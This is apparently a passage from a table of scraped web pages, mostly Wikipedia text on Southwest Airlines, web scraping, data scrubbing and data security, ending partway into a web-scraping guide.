maintenance operations, customer support and services, and training. The project was completed in late 2013, with occupancy beginning in 2014. On June 2, 2016, Southwest broke ground on its new office and training facility known as Wings. The newest addition to the corporate campus is composed of a 420,000 square-foot, six-story office building, and a 380,000 square-foot adjoining structure called the Leadership Education and Aircrew Development (LEAD) Center that serves as the new pilot training facility. The LEAD Center has the capacity to house and support 18 flight simulators. It is designed to be expanded to accommodate up to 26 simulator bays. The building opened on April 3, 2018. 57 On August 16, 2019, Southwest announced an expansion of the LEAD Center to accommodate eight additional simulators for future operational and training demands. 58 On January 2, 2020, it was announced that Southwest would be purchasing an additional 3 acres (1.2 ha) of land adjacent to its Wings and LEAD facilities. 59 No additional details were disclosed. As of June 30, 2022 update , Southwest Airlines had 62,333 active full-time equivalent employees. 60 According to The Washington Post, it uses the hiring motto of seeking people that have a "Servant's Heart, Warrior Spirit, Fun-LUVing Attitude". 61 It also uses the internal practice of ranking "employees first, customers second". 62 Bob Jordan, formerly executive vice president of corporate services, became Southwest's sixth CEO on February 1, 2022, replacing Gary C. Kelly. Kelly continues as chairman of Southwest Airlines. Kelly replaced former CEO Jim Parker on July 15, 2004, and assumed the title of president on July 15, 2008, replacing former president Colleen Barrett. In July 2008, Herb Kelleher resigned from his position as chairman. Barrett left her post on the board of directors and as a corporate secretary in May 2008 and as president in July 2008. Kelleher was president and CEO of Southwest from September 1981 to June 2001. 63 On June 23, 2021, Southwest announced that chairman and CEO Gary Kelly would transition roles in early 2022, becoming the carrier's executive chairman with the desire to serve in that role through at least 2026 at the discretion of the board of directors. Jordan also joined the board then. 64 On January 10, 2017, Southwest announced changes to the company's executive leadership ranks, with Thomas M. Nealon named as president and Michael G. Van de Ven as the airline's chief operating officer. 65 On September 14, 2021, Southwest announced Nealon had decided to retire from his duties as president effective immediately, but would continue to serve the company as a strategic advisor. Chief Operating Officer Mike Van de Ven was named as the company's president the same day, and remains COO. 66 About 83% of Southwest employees are members of a union. 67 The Southwest Airline Pilots' Association, a union not affiliated with the Air Line Pilots Association, represents the airline's pilots. 68 The aircraft maintenance technicians are represented by the Aircraft Mechanics Fraternal Association. 69 Customer service agents and reservation agents are represented by the International Association of Machinists and Aerospace Workers Union. Flight dispatchers, flight attendants, ramp agents, and operations agents are represented by the Transport Workers Union. The company has appeared on various "best places to work" list, with its employee culture mentioned by Travel and Leisure, CNBC, and Forbes. 70 71 The company has also been named to Fortune magazine's "Most Admired Companies" list, reaching number 14 in 2021. 72 Southwest has never furloughed an employee. 73 As a result of the COVID 19 pandemic, the company launched voluntary separation and extended time-off programs in 2020, and around 16,900 employees volunteered to take an early retirement or long-term leave. 74 Roughly 24% were pilots and 33% were flight attendants. 75 In late 2020, the airline issued some WARN Act notices and announced incipient pay cuts for many employees in response to pandemic impacts, but these measures were rescinded after the Consolidated Appropriations Act, 2021 was enacted on December 27, 2020, providing additional financial aid to US airlines. 76 Southwest and its business model have had an influence on other low-cost carriers (LCC's). The competitive strategy combines a high level of employee and aircraft productivity with low unit costs by reducing aircraft turnaround time, particularly at the gate. 77 Europe's EasyJet and Ryanair are two of the best-known airlines to follow Southwest's business strategy in that continent. Other airlines with a business model based on Southwest's system include Canada's WestJet, Malaysia's AirAsia (the first and biggest LCC in Asia), India's IndiGo, Australia's Jetstar, a subsidiary of Qantas (although Jetstar now operates three aircraft types), Philippines' Cebu Pacific, Thailand's Nok Air, Mexico's Volaris, Indonesia's Lion Air and Turkey's Pegasus Airlines. 77 Southwest Airlines has a history of lobbying against high-speed rail, which it sees as a competitor for short-distance commuter flights. In the early 1990s, Southwest lobbied US Congress and the Texas Legislature to oppose a high-speed rail system between Dallas, San Antonio, and Houston, and filed three lawsuits against the initiative. 78 79 80 81 In 1991, Southwest told Texas authorities, "Rail has a romantic appeal, but this case cannot be decided on the basis of nostalgia or even a desire to emulate the rail service of France and Germany. The American reality is that high-speed rail will be viable in Texas only by destroying the convenient and inexpensive transportation service the airlines now provide, and only by absorbing huge public subsidies. 79 In 1994, the high-speed rail initiative was cancelled. 78 While several reasons led to the initiative's demise, most commentators attribute a key role to Southwest Airlines' aggressive campaign against it. 81 The company has always employed humor in its advertising. Former slogans include "Love Is Still Our Field", "Just Plane Smart", "The Somebody Else Up There Who Loves You", "You're Now Free to Move About the Country", "THE Low Fare Airline", "Grab your bag, It's On , and "Welcome Aboard". The airline's slogan (as of 2022) is "Low fares. Nothing to hide. That's TransFarency 82 In March 1992, shortly after Southwest started using the "Just Plane Smart" motto, Stevens Aviation, which had been using "Plane Smart" for its motto, advised Southwest that it was infringing on its trademark. 83 84 Instead of a lawsuit, the CEOs for both companies staged an arm-wrestling match. Held at the now-demolished Dallas Sportatorium and set for two out of three rounds, the loser of each round was to pay $5,000 to the charity of his choice, with the winner gaining the use of the trademarked phrase. A promotional video was created showing the CEOs "training" for the bout (with CEO Herb Kelleher being helped up during a sit-up where a cigarette and glass of Wild Turkey 101 whiskey was waiting) and distributed among the employees and also as a video press release along with the video of the match itself. Herb Kelleher lost the match for Southwest, with Stevens Aviation winning the rights to the phrase. Kurt Herwald, CEO of Stevens Aviation, immediately granted the use of "Just Plane Smart" to Southwest Airlines. The net result was both companies having use of the trademark. 85 Southwest has had nine accidents, including two aircraft hull losses and four deaths: one accidental passenger death in flight, two non-passenger deaths on the ground, and one passenger death from injuries he sustained when subdued by other passengers while attempting to break into the cockpit of an aircraft. The airline is considered among the safest in the world. No passenger has died as a result of a crash. 86 N7737E N8555Z On June 22, 2011, a March 25 recording was released to the press of an apparently inadvertent in-flight radio transmission of Southwest captain James Taylor conversing with his first officer. The conversation was peppered with obscenities directed at gay, overweight, and older flight attendants. According to Southwest, the pilot was reprimanded and temporarily suspended without pay and received diversity education before being reinstated. 90 91 92 On September 26, 2017, a woman was removed from a Southwest flight after claiming to have a life-threatening allergy to dogs, two of which were present on the aircraft, including a service animal. Southwest employees requested that she provide documentation of her condition and staff asked her to exit the aircraft multiple times. Police ultimately had to escort her away. 93 94 On December 29, 2017, a family was removed from a flight from Chicago Midway Airport because of an unconfirmed head lice accusation. The family did not have lice and was re-accommodated on a flight two days later. 95 In October 2019, a Southwest flight attendant filed a lawsuit against the airline, claiming that two pilots had livestreamed footage from a camera hidden in the plane's toilet to an iPad, and that one of the pilots said that such cameras were a "top-secret security measure" installed in all of the airline's 737 800 aircraft. 96 Southwest and the pilot union stated that the film was a hoax and a "poor attempt at humor" by one of the pilots, who had previously recorded himself on a different aircraft, fully clothed. 97 In February 2020, a report conducted by the DOT inspector general found that Southwest was flying airplanes with safety concerns and that the Federal Aviation Administration was failing to properly oversee the airline. 98 In 2020, a captain of a Southwest flight watched pornography on a laptop computer with his clothes removed while his female first officer continued her duties. The captain retired before the incident was reported, but he was subsequently prosecuted for intentionally committing a lewd, indecent or obscene act in a public place, and the airline terminated his retirement benefits. 99 100 On May 23, 2021, a female passenger aboard a Southwest flight repeatedly punched a female flight attendant in the face after landing at San Diego International Airport, causing the attendant to lose two teeth. The passenger was subsequently charged with causing serious bodily injury. 101 Citing four whistleblowers, federal investigators with the US Office of Special Counsel released a report on July 27, 2022, that follows up on the 2020 DOT inspector general's report. The 2022 report claims that Southwest stonewalled Federal Aviation Administration (FAA) investigations into maintenance and piloting safety lapses, and criticized the FAA for failing to adequately oversee the airline, stating that senior FAA staff "mismanaged and interfered" with investigations "in the face of SWA's intimidation tactics". The report accuses Southwest of misusing the FAA's Aviation Safety Action Program (ASAP) to hide pilot errors, while accusing the FAA of failing to adequately oversee Southwest's mechanics, and of failing to adequately vet maintenance records provided by the airline for forty-nine 737 aircraft purchased from foreign carriers whose documentation practices did not meet FAA standards. 102 The airline experienced severe delays and thousands of flight cancellations starting on December 21, 2022, and continuing through the Christmas holiday, a series of events commonly known as the Southwest Airlines holiday meltdown. 103 104 105 While many cancellations were due to bad weather from the severe late December winter storm across much of the United States, industry experts and SWAPA also blamed inadequate staffing and the airline's "outdated" employee scheduling system, citing reports of pilots waiting on hold on the telephone for up to eight hours awaiting work assignments. 106 107 On December 26, the airline initiated a massive system "reset", preemptively canceling thousands of flights and halting ticket sales over concerns that travelers might buy tickets for flights that were subsequently canceled. 107 Federal officials criticized the airline and US Department of Transportation (USDOT) Secretary Pete Buttigieg announced a formal investigation. 108 Some experts attributed the crisis to the lack of scheduling flexibility inherent in the airline's point-to-point operations model. 109 Paul Krugman in The New York Times suggested the turmoil was not as much about corporate greed as some might expect and noted that despite an increasingly digitalized world, "there's a lot of physical action, and real-world labor, going on behind the scenes. 110 Another writer on the paper's opinion pages, Elizabeth Spiers, said this was an example of the airlines knowing they are offering passengers a poor deal but that many people have little choice given the alternatives. 111 In December 2023, the airline reached a settlement and received a record-setting $140 million fine from the USDOT, the largest fine ever imposed by the agency by a factor of roughly 30, and has reported losses exceeding $1.1 billion stemming from the crisis. 103 104 105 112 113 |
172 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Category:Articles_needing_additional_references_from_April_2023 | This category combines all articles needing additional references from April 2023 (2023 04) to enable us to work through the backlog more systematically. It is a member of Category:Articles needing additional references. The following 200 pages are in this category, out of approximately 3,507 total. This list may not reflect recent changes. |
173 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-20 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
174 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Category:Articles_with_unsourced_statements_from_April_2023 | This category combines all articles with unsourced statements from April 2023 (2023 04) to enable us to work through the backlog more systematically. It is a member of Category:Articles with unsourced statements. To add an article to this category add Citation needed date April 2023 to the article. If you omit the date a bot will add it for you at some point. The following 200 pages are in this category, out of approximately 6,907 total. This list may not reflect recent changes. |
175 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scrubbing | Data scrubbing is an error correction technique that uses a background task to periodically inspect main memory or storage for errors, then corrects detected errors using redundant data in the form of different checksums or copies of data. Data scrubbing reduces the likelihood that single correctable errors will accumulate, leading to reduced risks of uncorrectable errors. Data integrity is a high-priority concern in writing, reading, storage, transmission, or processing of data in computer operating systems and in computer storage and data transmission systems. However, only a few of the currently existing and used file systems provide sufficient protection against data corruption. 1 2 3 To address this issue, data scrubbing provides routine checks of all inconsistencies in data and, in general, prevention of hardware or software failure. This "scrubbing" feature occurs commonly in memory, disk arrays, file systems, or FPGAs as a mechanism of error detection and correction. 4 5 6 With data scrubbing, a RAID controller may periodically read all hard disk drives in a RAID array and check for defective blocks before applications might actually access them. This reduces the probability of silent data corruption and data loss due to bit-level errors. 7 In Dell PowerEdge RAID environments, a feature called "patrol read" can perform data scrubbing and preventive maintenance. 8 In OpenBSD, the bioctl(8) utility allows the system administrator to control these patrol reads through the BIOCPATROL ioctl on the dev bio pseudo-device; as of 2019, this functionality is supported in some device drivers for LSI Logic and Dell controllers — this includes mfi(4) since OpenBSD 5.8 (2015) and mfii(4) since OpenBSD 6.4 (2018). 9 10 In FreeBSD and DragonFly BSD, patrol can be controlled through a RAID controller-specific utility mfiutil(8) since FreeBSD 8.0 (2009) and 7.3 (2010). 11 The implementation from FreeBSD was used by the OpenBSD developers for adding patrol support to their generic bio(4) framework and the bioctl utility, without a need for a separate controller-specific utility. In NetBSD in 2008, the bio(4) framework from OpenBSD was extended to feature support for consistency checks, which was implemented for dev bio pseudo-device under BIOCSETSTATE ioctl command, with the options being start and stop (BIOC SSCHECKSTART VOL and BIOC SSCHECKSTOP VOL, respectively); this is supported only by a single driver as of 2019 — arcmsr(4). 12 Linux MD RAID, as a software RAID implementation, makes data consistency checks available and provides automated repairing of detected data inconsistencies. Such procedures are usually performed by setting up a weekly cron job. Maintenance is performed by issuing operations check, repair, or idle to each of the examined MD devices. Statuses of all performed operations, as well as general RAID statuses, are always available. 13 14 15 As a copy-on-write (CoW) file system for Linux, Btrfs provides fault isolation, corruption detection and correction, and file-system scrubbing. If the file system detects a checksum mismatch while reading a block, it first tries to obtain (or create) a good copy of this block from another device if its internal mirroring or RAID techniques are in use. 16 Btrfs can initiate an online check of the entire file system by triggering a file system scrub job that is performed in the background. The scrub job scans the entire file system for integrity and automatically attempts to report and repair any bad blocks it finds along the way. 17 18 The features of ZFS, which is a combined file system and logical volume manager, include the verification against data corruption modes, continuous integrity checking, and automatic repair. Sun Microsystems designed ZFS from the ground up with a focus on data integrity and to protect the data on disks against issues such as disk firmware bugs and ghost writes. failed verification 19 ZFS provides a repair utility called scrub that examines and repairs silent data corruption caused by data rot and other problems. Due to the high integration density of contemporary computer memory chips, the individual memory cell structures became small enough to be vulnerable to cosmic rays and or alpha particle emission. The errors caused by these phenomena are called soft errors. This can be a problem for DRAM- and SRAM-based memories. Memory scrubbing does error-detection and correction of bit errors in computer RAM by using ECC memory, other copies of the data, or other error-correction codes. Scrubbing is a technique used to reprogram an FPGA. It can be used periodically to avoid the accumulation of errors without the need to find one in the configuration bitstream, thus simplifying the design. Numerous approaches can be taken with respect to scrubbing, from simply reprogramming the FPGA to partial reconfiguration. The simplest method of scrubbing is to completely reprogram the FPGA at some periodic rate (typically 1 10 the calculated upset rate). However, the FPGA is not operational during that reprogram time, on the order of micro to milliseconds. For situations that cannot tolerate that type of interruption, partial reconfiguration is available. This technique allows the FPGA to be reprogrammed while still operational. 20 |
176 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Portal:Current_events | Armed conflicts and attacks Law and crime Politics and elections Armed conflicts and attacks Disasters and accidents Health and environment Law and crime Politics and elections Armed conflicts and attacks Business and economy Disasters and accidents Health and environment International relations Law and crime Politics and elections Armed conflicts and attacks Disasters and accidents Health and environment Law and crime Politics and elections Armed conflicts and attacks Disasters and accidents Law and crime Politics and elections Science and technology Armed conflicts and attacks Arts and culture Business and economy Disasters and accidents Law and crime Politics and elections Science and technology Armed conflicts and attacks Disasters and accidents International relations Politics and elections Sports |
177 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_security | Data security means protecting digital data, such as those in a database, from destructive forces and from the unwanted actions of unauthorized users, 1 such as a cyberattack or a data breach. 2 Disk encryption refers to encryption technology that encrypts data on a hard disk drive. 3 Disk encryption typically takes form in either software (see disk encryption software) or hardware (see disk encryption hardware). Disk encryption is often referred to as on-the-fly encryption (OTFE) or transparent encryption. Software-based security solutions encrypt the data to protect it from theft. However, a malicious program or a hacker could corrupt the data to make it unrecoverable, making the system unusable. Hardware-based security solutions prevent read and write access to data, which provides very strong protection against tampering and unauthorized access. Hardware-based security or assisted computer security offers an alternative to software-only computer security. Security tokens such as those using PKCS 11 or a mobile phone may be more secure due to the physical access required in order to be compromised. 4 Access is enabled only when the token is connected and the correct PIN is entered (see two-factor authentication). However, dongles can be used by anyone who can gain physical access to it. Newer technologies in hardware-based security solve this problem by offering full proof of security for data. 5 Working off hardware-based security: A hardware device allows a user to log in, log out and set different levels through manual actions. The device uses biometric technology to prevent malicious users from logging in, logging out, and changing privilege levels. The current state of a user of the device is read by controllers in peripheral devices such as hard disks. Illegal access by a malicious user or a malicious program is interrupted based on the current state of a user by hard disk and DVD controllers making illegal access to data impossible. Hardware-based access control is more secure than the protection provided by the operating systems as operating systems are vulnerable to malicious attacks by viruses and hackers. The data on hard disks can be corrupted after malicious access is obtained. With hardware-based protection, the software cannot manipulate the user privilege levels. A hacker or a malicious program cannot gain access to secure data protected by hardware or perform unauthorized privileged operations. This assumption is broken only if the hardware itself is malicious or contains a backdoor. 6 The hardware protects the operating system image and file system privileges from being tampered with. Therefore, a completely secure system can be created using a combination of hardware-based security and secure system administration policies. Backups are used to ensure data that is lost can be recovered from another source. It is considered essential to keep a backup of any data in most industries and the process is recommended for any files of importance to a user. 7 Data masking of structured data is the process of obscuring (masking) specific data within a database table or cell to ensure that data security is maintained and sensitive information is not exposed to unauthorized personnel. 8 This may include masking the data from users (for example so banking customer representatives can only see the last four digits of a customer's national identity number), developers (who need real production data to test new software releases but should not be able to see sensitive financial data), outsourcing vendors, etc. 9 Data erasure is a method of software-based overwriting that completely wipes all electronic data residing on a hard drive or other digital media to ensure that no sensitive data is lost when an asset is retired or reused. 10 In the UK, the Data Protection Act is used to ensure that personal data is accessible to those whom it concerns, and provides redress to individuals if there are inaccuracies. 11 This is particularly important to ensure individuals are treated fairly, for example for credit checking purposes. The Data Protection Act states that only individuals and companies with legitimate and lawful reasons can process personal information and cannot be shared. Data Privacy Day is an international holiday started by the Council of Europe that occurs every January 28. 12 Since the General Data Protection Regulation (GDPR) of the European Union (EU) became law on May 25, 2018, organizations may face significant penalties of up to 20 million or 4% of their annual revenue if they do not comply with the regulation. 13 It is intended that GDPR will force organizations to understand their data privacy risks and take the appropriate measures to reduce the risk of unauthorized disclosure of consumers’ private information. 14 The international standards ISO IEC 27001:2013 and ISO IEC 27002:2013 cover data security under the topic of information security, and one of its cardinal principles is that all stored information, i.e. data, should be owned so that it is clear whose responsibility it is to protect and control access to that data. 15 16 The following are examples of organizations that help strengthen and standardize computing security: The Trusted Computing Group is an organization that helps standardize computing security technologies. The Payment Card Industry Data Security Standard (PCI DSS) is a proprietary international information security standard for organizations that handle cardholder information for the major debit, credit, prepaid, e-purse, automated teller machines, and point of sale cards. 17 The General Data Protection Regulation (GDPR) proposed by the European Commission will strengthen and unify data protection for individuals within the EU, whilst addressing the export of personal data outside the EU. The four types of technical safeguards are access controls, flow controls, inference controls, and data encryption. Access controls manage user entry and data manipulation, while flow controls regulate data dissemination. Inference controls prevent deduction of confidential information from statistical databases and data encryption prevents unauthorized access to confidential information. 18 |
178 | https://en.wikipedia.org/wiki/Web_scraping | https://proxyway.com/guides/what-is-web-scraping | All Reviews Types All Types Use Cases All Use Cases Locations All Locations Best Tools All Best Tools Our Tools All Our Tools Proxies All Proxy Guides Web Scraping All Scraping Guides We use affiliate links. They let us sustain ourselves at no cost to you. Learn the basics of web scraping with this comprehensive overview. Web scraping is a very powerful tool for collecting data on a large scale and extracting valuable insights from it, whether for personal or business use. This guide will give you a comprehensive overview of what web scraping is, how it works, and what you can do with it. Let’s get started Web scraping refers to the process of collecting data from the web. It’s usually performed using automated tools web scraping software or custom-built scripts. Web scraping goes by various names. It can also be called web harvesting, web data extraction, screen scraping, or data mining. There are some subtle differences between these terms, but they’re used more or less interchangeably. You may wonder what’s the point of scraping the web? Well, it creates a lot of value. For one, you can use data scraping to greatly speed up tasks. Let’s say you want to collect reviews from multiple websites like Amazon and Google to learn about a product. With web scraping, it takes minutes; manually, you’d spend hours or even days. Web scraping also helps to automate repetitive work. During Covid 19 lockdowns, it was often very hard to order food online because all the delivery slots were taken. Instead of refreshing the web page manually, you could build a web scraper do it for you and then notify you once a slot opens. Web scraping also has powerful commercial uses. Some companies use it to 